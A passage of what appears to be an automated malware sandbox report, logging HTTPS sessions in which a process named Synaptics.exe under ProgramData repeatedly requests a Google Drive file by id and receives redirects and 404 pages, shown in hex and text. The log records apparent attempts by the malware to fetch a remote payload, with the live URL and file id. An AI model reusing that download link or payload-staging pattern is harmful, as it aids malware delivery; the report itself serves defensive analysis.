                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:41 UTC132INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><titl
                                                                                                            2024-11-15 10:23:41 UTC1378INData Raw: 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 6e 6f 56 66 61 47 43 5a 50 49 32 5f 45 73 59 76 68 38 41 5f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68
                                                                                                            Data Ascii: e>Error 404 (Not Found)!!1</title><style nonce="vnoVfaGCZPI2_EsYvh8A_w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-heigh
                                                                                                            2024-11-15 10:23:41 UTC142INData Raw: 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: pan></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.1649738142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:42 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:42 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-KFiXBi9zV8NsnUQcJacVhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.1649737142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:42 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:42 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Vb9mQVNeEQAUzbNINp0QHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.1649739142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:23:42 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:42 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-p9BG4DZgJUz7Mnn4sIUu3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC6Rgn-k5P4zZCNn2251JsyUHVJBxLxNg32qsrLpRLMZ3MFcKVYs1myuJd1wWFJk-b35NNbr5-dl2Q
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:42 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:23:42 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 53 68 48 72 41 34 67 38 67 46 47 47 47 34 50 55 4b 33 34 4b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="cShHrA4g8gFGGG4PUK34KA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:23:42 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.1649740142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:23:42 UTC1246INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:42 GMT
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-N6-oDqMd85dbC50aH0YZvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY0iGK6LLCieb78sH308NIyZvL5BY9KayvBeI27tWt0pjOdD06VMPQifpkf8SQd8P8RH7XE
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:42 UTC132INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><titl
                                                                                                            2024-11-15 10:23:42 UTC1378INData Raw: 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 6d 2d 41 46 58 4c 35 58 72 4f 75 61 76 6f 47 67 76 70 38 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68
                                                                                                            Data Ascii: e>Error 404 (Not Found)!!1</title><style nonce="Gm-AFXL5XrOuavoGgvp8vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-heigh
                                                                                                            2024-11-15 10:23:42 UTC142INData Raw: 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: pan></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.1649747142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:43 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:43 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-hqiR1F9T5knsPLVCWSHf0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.1649746142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:43 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:43 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9v0j7pZZRJDhUTTefd_FHQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.1649752142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:23:45 UTC1246INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:45 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-EV9ShNppUNIrt-oCFPKVVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY2MZ9waaS5O8PdRUeWLOXiZri5zFmP996unH6bn9nBn9F5wmdRAH7fgiPbPpIan2tb73dw
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:45 UTC132INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><titl
                                                                                                            2024-11-15 10:23:45 UTC1378INData Raw: 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 4f 58 61 4f 67 47 4b 6a 7a 4f 35 4a 76 74 55 39 59 2d 79 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68
                                                                                                            Data Ascii: e>Error 404 (Not Found)!!1</title><style nonce="mOXaOgGKjzO5JvtU9Y-yRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-heigh
